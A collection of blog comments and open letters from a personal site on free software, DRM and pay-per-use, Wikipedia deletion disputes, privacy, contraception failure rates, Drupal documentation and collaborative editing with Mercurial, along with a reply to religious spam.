-> An answer to a distro battle at linuxhumor. This is an example of a text which was hard for me to write in a calm tone. I think I mostly succeeded, but parts of the emotions on both sides still bleed through… take it as an example of how hard it is to stay calm in a heated situation - and how important.

Please keep your own language in check, and don't pull Stallman in here, when he isn't needed. He's got more important things to do than helping your argumentation.

If you look at what I wrote, you'll see I never said "Your distro is bad" or anything similar.

I just said: "Your advertising is a good deal too blunt."

Why do you answer to other people who say things intended to offend you?

Or to put it differently: Why didn't you react to my post with backup information on why Ultumix is good and where it helps to convert people, cutting out the advertising language so it can be read as information?

I see that you're pissed off by Ubuntu. I don't like the "one distro to find them, one distro to ..." mindset you told about either, but I doubt that all Ubuntu people have it. I'm not active in Ubuntu, so I don't know much about the internals (I don't even know what LoCo means - I assume Local Coordinators or something like that). I just installed it for my wife, because my Gentoo might have been a bit too much for her (this changed in the meantime: she now has a Gentoo, too :) ).

You're pissed off, and that's OK. I think if I had walked your way, I might be pissed, too. But it doesn't help you spread your Distro to other people.

Get a grip on your emotions - get a sandbag and hit it when you're just a bit too pissed (I do that from time to time, and unless you've tried it yourself, it might be hard for you to see how very good it feels to just let out the anger at that 15kg sandbag). But stop before your knuckles bleed :)

We are writing here, so it is possible to just sit back and have a break, which makes it easier to get a grip on oneself. At the same time we're only reading what others write, which makes it easier to misinterpret them, so keeping our own emotions in check (or letting them out where they don't hurt anyone but our knuckles) gets more important.

And I know I sound like a pseudo-wise great grandfather now. That isn't intentional. I'm learning my way in life myself, and I might just be wrong about it (and also about anything else I think I know), but I write it anyway, because I made some errors myself, and I want to help others not to walk into the same trap. And if what I see right now is only a necessary transition to even better ways to live, then I can at least help others reach that transition with less hardship than I had.

Open Letter to Julia Hilden on her article about pay-per-use

I just read your article on per use payments.

I think there are two serious flaws in per use payments:

(a) Good works of art need to last

As you stated correctly, I define myself partly through the media I "consume".

This means that I want to have the assurance that I can watch a great movie again a few years in the future.

Imagine this scenario:

  • I found a really great book, read it and got entranced.
  • It's 20 years later now, and I want to read the book to my children.
  • Suddenly I realize that I'd have to pay for it again to be able to read it, but it's no longer available, because the company I bought it from on a per-use basis died 10 years ago, and no one took over, because managing the book became too costly to be paid for by the few people who still wanted to read it in a given year.

(b) Technical realization

For per-use payment, someone must monitor how often I use a work of art, and that means someone must have data on my behaviour, which isn't in the least compatible with personal data protection.

Also, to enable per use payments, you need DRM: Digital Rights Management, which needs to be spelled "Digital Restrictions Management" to account for its effect on end-users, because it restricts me from looking a second time at a file which I already have on my computer.

Without DRM you can't control my use of a document I downloaded to my computer, because it is on my territory which only I control.

With DRM the control over my computer switches to the manufacturer of the DRM, who restricts my usage and only allows me certain actions.

Naturally the DRM-master is then able to monitor and control my use of digital works, but the price for this is giving my personal domain into the hands of someone who isn't necessarily trustworthy (or would you trust Microsoft with your new anti-Microsoft book, just to name an example?).

There's a quite nice read on the web about the dangers of going through with your proposal, and its scope is even narrower than yours - it's only about keeping people from passing on books (for which you also need DRM), but it shows what will likely happen when the technology for realizing your idea is deployed:
Right to Read

And there is another one. Since your scheme needs DRM to enforce per-use payment, this one might also be interesting to you:
Can you trust your computer?

(and please keep in mind that even today a physics book can cost up to 150€, even though it costs far less than that to produce, and students don't have much money, so pay-per-read wouldn't magically lower prices).

So, while pay per use sounds nice and fair from a distance, it grows into a maze of trouble when you take a closer look.

Best wishes,
Arne Babenhauserheide

Organize!

Organize! … That’s the thing that has a chance of preventing all of this, and of saving the most lives when that fails. — Yonatan Zunger

I’m not sure it is a good idea to reply to this article. I am doing it anyway, because it’s already on record that I read this article. Likely even at what pace I read it.

Thank you for this article, Yonatan Zunger. This is frightening, but in an important way. And organized well enough that the essential ideas stick. Important ideas.

With images of cute animals. Added with reason.

What “Things Going Wrong” Can Look Like

Reading deeply recommended.

Powers that be - money concentration vs. democracy

-> written in reply to Bogus Copyright Claim Silences Yet Another Larry Lessig YouTube Presentation on techdirt.

This shows painfully how power is shifting currently:

  • <5% of the people have >90% of the resources.
  • So the <5% have more influence on the media.
  • The media influences which people are elected into positions of power.
  • Then these elected pass laws which shift more resources and power towards the <5%.

So the simple root of the problem is that money gets concentrated in the hands of a few people, and any self-respecting (intelligent) democracy would have to make sure that money can't accumulate too much like that.1

But guess who doesn't want laws which prevent or revert runaway money concentration.

This is a conflict which a democracy cannot avoid. It checks whether a given democratic system can stand the test of time.


  1. You can find a deeper discussion of the problems money concentration causes for democracy in a German article on this site

Richard M. Stallman stands for Free Software

→ a comment to 10 Hackers Who Made History by Gizmodo.

As DDevine says, Richard Stallman is no proponent of Open Source, but of Free Software. Open Source was forked from the Free Software movement to the great displeasure of Stallman.

He really does not like the term Open Source, because that implies that it is only about being able to read the sources.

Different from that, Free Software is about the freedom to be in control of the programs one uses, and to change them.

More exactly it defines 4 Freedoms:

  • (0) The freedom to run the program in any way you want (compare this with Windows, which does not let me start it in a virtual machine, because “the hardware changed”).

  • (1) The freedom to access the source and change the program (compare this to Starcraft 2 which I can’t use in a LAN-party without having everyone connected to the internet).

  • (2) The freedom to copy it and give it to others (compare that to all these iApps, which I can’t even backup easily for my own use).

  • (3) The freedom to distribute my changed versions.

This is Free Software as defined by the free software movement which was initiated by Richard Stallman and which made successes like Google possible by giving them a stepping stone to build upon: Free Software users stand on the shoulders of giants.

Open Source on the other hand is often used as a name for products which don’t even fulfill freedom (1) completely. That’s why the GNU project did not take part in the first Google Summer of Code: Google required contributors to say that they work on Open Source. In the second Summer of Code that was changed, so projects can now correctly identify themselves as Free Software projects, and GNU has been taking part in the Google Summer of Code since then.

PS: But still it’s great to see Stallman in this list!

Swarming, Torrent and Gnutella

In Reply to:
http://www.computeractive.co.uk/personal-computer-world/features/2193584...

Hi,

I just wanted to add that swarming has been included in Gnutella since about 2003, and that it already achieved everything back then that the "new trackerless torrents" achieve today.

If you want easy-to-read information which doesn't need a coder to understand it, just have a look at Gnutella For Users: A guide to the changes in Gnutella for non-programmers.

http://gnufu.net

The Four Freedoms of Free Culture: Avoid Cultural Slavery

→ comment to The Four Freedoms of Free Culture on QuestionCopyright.org.

Thank you for spreading the thought of freedom in culture!

I currently don’t use creativecommons licenses on my site, because they have no source protection (you can’t exercise your right to modify if the work is hidden inside some non-source container, like autoscrolling flash).

Update: I changed this in 2015 when cc by-sa became one-way compatible with GPLv3. Now I also allow cc by-sa for text.

Instead I use the GPLv3, for my site (draketo.de licensing) as well as for a free roleplaying book I write (1w6.org — German).

My reason for using free licenses in all my hobby work is simple: When a cultural work becomes part of my life, any restriction on using that work takes away a part of my personal freedom.

That’s why freedom is essential for all cultural works that matter.

Becoming part of my life means that I identify with it, that it means something to me. If there’s a really cool song I listen to all day, then it becomes part of my life.

If I then can’t change and share it when my tastes change, that part of my life is locked and my freedom taken away. Works which don’t mean something to me can’t take much of my freedom away. But if a cultural work means something to someone out there — to anyone — then it has to be free to avoid stealing that one fan’s freedom.

So any unfree cultural work is either useless (doesn’t mean anything to anyone) or it’s a tool for cultural slavery (stealing our freedom).1

And I think Stallman is simply afraid. In software he has the confidence that his work will be improved by others. In culture he doesn’t. I think that’s part of his life, and the only way to change that is to show that free culture is a success for political movements, too.

It’s hard to allow your child to spread its wings and fly on its own, and I think that for him, the manifestos which spawned the free software movement are his children.


  1. At the same time, though, a cultural work which doesn’t get written doesn’t have the potential to help people progress. So if an unfree work helps people throw off other shackles, then the net gain for freedom might be positive. Just always keep in mind that being unfree has a cost for every user of the work – which includes all your fans. If your work is unfree, it is worth less than if it were free licensed. 

Unwanted pregnancy hits at random

If you do not want to have a child right now, but you want to have a fulfilled heterosexual sex-life, pregnancy is a risk which can hit anyone, however careful he or she is to avoid it. This is an answer I gave someone who equated unintentional pregnancy with questionable morals.

According to "How effective are condoms against pregnancy?":

If you use condoms perfectly every single time you have sex, they’re 98% effective at preventing pregnancy. But people aren’t perfect, so in real life condoms are about 82% effective — that means about 18 out of 100 people who use condoms as their only birth control method will get pregnant each year.

Other means of birth control are around 70-91% effective, with the sole exception of the implant which has 99% effectiveness, so even if people are perfectly hygienic and careful, there will be many pregnancies: if you are perfectly hygienic and careful for 10 years, there will be around one pregnancy per couple (on average).

Even with the implant or perfectly used condoms you’ll have 1-2 pregnancies for every 10 couples within 10 years.
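
As a rough sanity check of these numbers, here is a minimal sketch. The per-year failure rates are the ones quoted above; treating them as constant and independent from year to year is my own simplification, not something from the quoted source.

    def chance_of_pregnancy(effectiveness, years=10):
        """Probability of at least one unintended pregnancy over `years` years."""
        return 1 - effectiveness ** years

    print(chance_of_pregnancy(0.91))  # typical methods: ~0.61, so most couples within 10 years
    print(chance_of_pregnancy(0.98))  # perfectly used condoms: ~0.18, roughly 2 in 10 couples
    print(chance_of_pregnancy(0.99))  # implant: ~0.10, roughly 1 in 10 couples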

That means calling people unhygienic or careless who get pregnant or whose partner gets pregnant is a false argument.

Reality is: a pregnancy is an ever-present risk if a man and a woman have sex, whatever you do to prevent it. Getting pregnant when you did not want to get pregnant is bad luck. You can be careful, but you cannot rule it out completely.

There is however an actually questionable moral code, but not the one of people who get pregnant unintentionally. The questionable code is the moral code of those who condemn people who got pregnant; the code of those who wrongly equate being hit by chance with moral inferiority.

If you find yourself condemning people for things which can happen to almost everyone, please look at the actual situation and reconsider that stance. You are not your moral code. If you find it to be wrong, you can change it, and you will find that you stay yourself and even become more rooted in your own self, because you then choose for yourself how you want to be.

People who decide whether they want to have a child should have the right to take that decision without interference from moral accusations. Their decision is an important one, so they need to be able to think clearly to find the best way forward. Moral accusations cloud the mind of both the accuser and the accused.

When you're happy with a free project, write a thank you!

From the Gentoo Forums:

I agree that spreading a positive message is good, but I've always been nervous to send thank you notes out to people I've never met. Worse, I don't want to potentially overload an inbox with a message that isn't going to help all that much. Hopefully it would be received in a positive way.

I try to remember to send "thank you"s from time to time.

Just remember that all these people are doing this in their free time, and one of the pillars of motivation is feedback and knowing that what you do is important.

For example I recently (two months ago) sent a mail to the developer of TortoiseHG in which I wrote him that to me his program is a revolution for version control systems, because it allows version control even for users who don't know much about their system (and added an example where I managed to use his program to work in a DVCS together with a mostly computer-illiterate Windows user - and get going in just 15 minutes).

I could almost feel the happy beaming in his reply where he said even this alone would make it worth all the effort he spent on it.

And I remember my own almost unbelieving joy at having people tell me that the pen-and-paper roleplaying system I write is the best system for their one-shots. It brightens up the whole day and makes me smile much and easily :)

Naturally contributing often feels even better (people who join in are one of the highest compliments to the project), but when that isn't possible (we all have limited time budgets), a friendly mail - or better still: a friendly public post which will also lead others to the program - is a great way to help your favorite project!

And if your favorite project already gets a lot of positive feedback, you could look at all the other projects you enjoy and see if one of them could get a bit more feedback. We live through diversity, and every little program adds its share.

Especially for people who get little feedback, such a message helps very much. If nothing else, it helps the developer see that his work has an important impact. And if the feedback is unexpected, that's even better. People who get tons of feedback might get used to it, but people who get very little feedback can really flourish - or at least enjoy a happy smile for a few hours, think fondly of what they accomplished and look forward to doing more.

PS: And if the project offers the option, giving a donation helps a lot, too. In a fair world the people behind those projects should be able to do them full-time. We can make the world a little fairer.

Why EMI locks channels: It’s a battle about control

To Why I Steal Movies… Even Ones I'm In by Peter Serafinowicz.

I think there’s a very simple reason why EMI remotely encumbers a channel: It’s a battle about control.

The battle about who will control where, when and how people can enjoy works of art.

That battle goes against the fans (who want to enjoy stuff and pay for it on their own terms) and the artists (who want people to enjoy their stuff and pay for it).

It benefits those who want to pull money out of the revenue stream (which goes from fans to artists) even though the almost free distribution via the internet makes them mostly obsolete.

And online piracy isn’t theft. It’s unauthorized copying which, as Peter Serafinowicz very nicely explains, can even help the artists make more money. The fans get more, the artists get more, only one loses: The one who wants to take freedom from fans and artists alike.

british telecom wants to block accounts just for using Gnutella or BitTorrent

-> a comment to BT to cut off file sharers from TechWatch.

I can read this article in two ways:
1) They took part in sharing/downloading that music file
2) They just had a bittorrent or Gnutella program running.

1 is unlikely, because not every fourth internet user will have downloaded that song.

And if 2 is the case, BT should be sued to its knees.

Having a Gnutella program is not illegal, and blocking access to Gnutella means vastly reduced service.

It's as if they took away your flat because someone saw you using a kitchen knife.

The same is true for BitTorrent which for example gets used by millions of people to download GNU/Linux distributions without creating too much traffic on the servers.

It's what you do with your tool that might be illegal, but having the tool is perfectly legal, and when BT blocks it, they are unduly worsening the service for their customers.

Best wishes,
Arne

deletion attempt against the dwm article on wikipedia (comment)

-> a comment to
Wikipedia, Notability, and Open Source Software by ubunTARD.

2010-03-23
Update: I just got unblocked by henrik, who also sent me an apology for the way the whole process was handled: “…The block was partly an individual misjudgment, but also a result of the systemic culture and some poorly thought out policies. If you're interested, I'd be happy to discuss it in more detail…”. And that restores a lot of my faith in the wikipedia community — thank you very much for your apology, henrik!
Also they are currently discussing on the incidents board how to avoid similarly excessive blocks in the future.

Just as an inside note from the discussion: I joined the first deletion discussion when I got word of it (I don't remember through which channel), and when it got closed, I joined the second one and got heavily frustrated when people tried to turn “he sent the developers a berliner bratwurst” into “the magazine which published his article is a primary source” (which would mean it wouldn't count as a source for “notability”).

In that discussion I was mostly alone, and I could only talk there because I've been a wikipedia user since 2004 and have casually corrected smaller errors in articles whenever I happened to see them while looking something up. I was one of the many small contributors who might not write large-scale articles all the time, but who do their share to improve the quality of the articles.

Most others couldn't join up, because the discussion was marked as “semi-closed”, so only longtime users could contribute. And the major contributor to the previous discussion was blocked for meatpuppetry, along with the developer of dwm (additional info) who didn't even cast a vote but only provided sources (reason: “mass ban the meatpuppets” — the dwm developer was unblocked afterwards by others).

After spending hours on refuting their claims, I got frustrated enough that I stopped discussing — and I posted that to identi.ca -> http://identi.ca/arnebab/tag/dwm

Subsequently I got blocked from editing on wikipedia “indefinitely” (except on my talk page) for “canvassing” (since when is ‘they want to delete dwm’ equal to ‘come all here and vote for keeping dwm for the following reasons…’?) and for quoting the policy which says that you shouldn't contribute to a deletion discussion if you don't know much about the topic — and for saying that I think Psychonaut isn't in a position to judge free wm’s.

-> Threat of blocking
-> Blocked and my reply

In my view the policy that you must not speak about the deletion attempt outside wikipedia or risk a ban is even worse than nondisclosure agreements: “You must not speak about this public discussion, or you get banned for meatpuppetry and canvassing.”

I am now pissed off badly enough that I won't go appealing for an unblock. If the powers-that-be in wikipedia don't see for themselves that the block is unjustified, then the power structures in there are such that any contribution I make is at the mercy of moderators who abuse policy to harass free software, since they are not stopped by the ones who don't agree with their doing.

Every public resource run by volunteers faces the danger of falling into the hands of dedicated abusers, and wikipedia is no exception. But it is exceptionally vulnerable, since the ones who contribute content are normally not interested in the necessary day-to-day maintenance, so writers and maintainers are strongly separated, but the maintainers get most of the power, because they are the ones who get informed of actions which concern articles they are interested in — and because they have the connections inside wikipedia.

But as if that wasn't bad enough, I think there's a third and easily overlooked group: those who don't write full articles, but do fact checking when they come upon an article on a topic they are knowledgeable about, and that way improve the general quality of wikipedia a lot (unstructured peer review). These don't take part in discussions, but mostly use wikipedia as a source, and so they don't want to spend hours on reading some new policy. Instead they generally trust that Wikipedia lives up to its goal of collecting the sum of human knowledge in encyclopedic articles - and they do their share to help achieve that goal.

They aren't seen as huge contributors, since every one only does some few changes each year, but together they make a huge difference.

I'm mostly a member of the last group (and to some degree article author) — I'm almost sure you expected that :)

And I think that anti-canvassing rules (“don't tell people that the project they feel strongly about is in trouble on wikipedia”) and excessive deletions chase away a major part of these casual editors (don't ask for a citation - this is gut feeling and my own thoughts: “Why should I spend 5 minutes on correcting a few errors in an article on a topic I know much about, when the article could be gone in 5 months' time?”).

The article authors might come regardless of the rules and try to add the topic they know much about. But the casual editors will likely be gone for good (and won't ever become authors).

And that would create a major change in the community, cutting wikipedia off from the normal people on the web. And you can imagine how that would affect the value of wikipedia to these people (the vast majority) and its resistance against being misused by some few people to further personal goals.

Besides: Who Writes Wikipedia suggests that even the main authors are mostly casual contributors, so the effects of alienating casual users would be even worse than I describe above: Wikipedia would lose its source of information.

PS: I didn’t join in the Appeal to delete anyway. Luckily it got refuted. Clearly.

information imbalance creates a power imbalance

→ a comment to You call it privacy invasion, I don't from Flameeyes.

What you state is a strong version of the “I’ve got nothing to hide” argument. If you’re interested in a thorough debunking, there is a very good article in the Chronicle about that: Why Privacy Matters even if you have nothing to hide.

In short: It’s about an imbalance in knowledge. The danger is less 1984 (that only applies to the weak nothing-to-hide argument, which assumes evildoing from others) and more Kafkaesque: other people make decisions about you without telling you how they reach those decisions. Since you do not know their sources (and often do not even know that they made a decision), you cannot correct misinformation about you. And the more those decisions by others affect you, the more you lose control over your life.

The good use case for information would be that you explicitly request to get advertisements for certain types of goods. Or for goods which are similar to a list of goods you explicitly select. Then you know the data from which the others make decisions about you, and you can change it.

using drupal for documenting software -> blogging with a structure

-> an answer to Blog posts are no replacement for documentation by flameeyes.

Hi flameeyes,

I kinda know your problem: It's far easier to write a number of blog posts than to write a structured book up front - and I think two major parts of that are that a weblog provides many more "Yes, I've done it!" moments than a book, and that a blog has a much lower barrier to entry.

I rather know it from the other side, though: I wrote a (german) roleplaying ruleset in a wiki, and I got very little feedback and often slacked.

My solution to that was to switch to Drupal which provides a book-style structure with (automatic) blog-style news. I now write articles which can stand for themselves but which are automatically organized by section and keyword.

I also do that for my personal page, but I think the RPG is a much better example (my personal pages are organized by content type/topic (song, poem, story, technical article, ...), while the RPG articles are more connected):

On the right-hand side you see the book navigation. The equivalent on my main page about programs would for example be:

A similar structure should be useful for your documentation of programs. You can even first write an uncategorized blog post and later sort it into its place (and also move it around freely afterwards) - for example when you realize that you write more about the topic.

That way you can start with writing something about a new program, and give that program its own category when you see that you're writing about it more often.

Another advantage of this is that I began to check every single text to see if it's interesting to read (category pages with only a few lines of text can easily be set to not appear on the frontpage - it's simply one checkbox to untick :) - once they grow into articles in their own right, they can then be "republished" to the frontpage with an updated publish date, so they appear as new posts).
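
To make that structure concrete, here is a toy model (not Drupal code) of the idea described above: every article can stand alone, optionally has a place in the book hierarchy, and the front page simply lists whatever was (re)published most recently. All titles, section names and dates are invented.

    from dataclasses import dataclass, field
    from datetime import date
    from typing import Optional

    @dataclass
    class Article:
        title: str
        body: str
        section: Optional[str] = None        # place in the book navigation, if any
        published: date = field(default_factory=date.today)
        on_frontpage: bool = True            # the "one checkbox to untick"

    articles = [
        Article("First notes on libfoo", "...", section=None),   # starts uncategorized
        Article("libfoo: configuration", "...", section="libfoo"),
        Article("libfoo stub page", "...", section="libfoo", on_frontpage=False),
    ]

    def frontpage(articles):
        """Newest visible articles first, like the blog view."""
        return sorted((a for a in articles if a.on_frontpage),
                      key=lambda a: a.published, reverse=True)

    def book_section(articles, section):
        """All articles sorted into one section, like the book navigation."""
        return [a for a in articles if a.section == section]

    # Later you can sort a post into its place and "republish" it:
    articles[0].section = "libfoo"
    articles[0].published = date.today()     # bumps it back onto the front page

    print([a.title for a in frontpage(articles)])
    print([a.title for a in book_section(articles, "libfoo")])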

writing together – collaborative editing is easy

→ comment to The next wave in scholarly word processors?

What I’d like to see is more people using version tracking systems.

With these you have a discussion which can be merged easily when it gets branched. I use it for anything I do, and I could use it together with an only-Windows-and-GUI user with ease, installing TortoiseHG for both of us and LyX for him (LaTeX made easy – you don’t have to see the sources).

Just right click in a folder, call synchronize and pull and your work gets merged.
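
For those who prefer the command line over the TortoiseHG GUI, the same pull-and-merge step looks roughly like this; a minimal sketch assuming Mercurial is installed and that it runs inside a working copy, with a placeholder URL.

    import subprocess

    def pull_and_merge(remote="https://example.org/shared-paper"):
        subprocess.run(["hg", "pull", remote], check=True)   # fetch the co-author's changes
        subprocess.run(["hg", "merge"], check=True)          # merge them (aborts if nothing to merge)
        subprocess.run(["hg", "commit", "-m", "merge changes from co-author"], check=True)

    if __name__ == "__main__":
        pull_and_merge()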

For publishing to the web and to PDF I’d use Emacs org-mode or Markdown with Markdown to LaTeX:

Maybe with markdownify for pages which already are HTML:

Besides: A simple Mercurial repository with URLs as document identifiers would allow forking the web :)

For religious spammers: Shut up and help save our *planet*

-> the_gdf just got spam from a raving christian. Since I am a moderator there, I got that spam and rejected it. But because I was in a good mood, I felt compelled to answer :)

- insert random ravin' lunatic the-world-is-going-to-end talk -

*gg*

Have fun!

Me, instead, I'd rather go with the 6th world of the Incas - they were there earlier than your book.

The alternative is to just believe in science: Ecologists told us 30 years ago

"We're destroying our environment. if we keep doing this, 30 years from now the earth will warm and we'll have weather catastrophies, epidemies (through warmer climate) and much more".

Well, now it's 30 years later and we have weather catastrophes, epidemics and much more.

Also, more than 30 years ago, left-wing economists warned us: "if we keep distributing money unevenly and letting big companies run free, our economy will crash again".

Well, it's more than 30 years later, and guess what? They were right. We now have a worldwide economic crisis.

Oh, and more than 14 years ago, people tried to tell the American government "If you keep building up terrorists to fight against Russia, these will turn around at some point and attack you". Then, 7 years ago, people (including me) said "if you attack Afghanistan, you will help the terrorists find new cannon fodder and that way strengthen terrorism".

And now it's 7 years later, and the Taliban and "international terrorists" are stronger than ever.

So get up from your book and look at the world. If we don't act, we let people turn our world into our own hell, so don't waste your time but act to save our world!

I don't care what your god says will happen after our death, but if he really created this world he will be damn pissed at YOU for letting it get destroyed - and I assume that you do care about that.

And here's a little hint: Every creator god is likely to see it the same way, so even if you are wrong and some other religion which believes in a creator god is right, the only way to be on the safe side is to help keep our planet alive.

And if there is no god, then my children will thank me for helping to save their future.

That said: Don't ever spam the_gdf again or my lawyer will be happy to get a chance to sue you. You've been warned.

Which also means: No one but me read your mail, and no one will, since it isn't going to get through.


I hope you enjoyed my answer :) I got slightly angry at the end, which I take as a warning to ignore these kinds of emails completely from now on.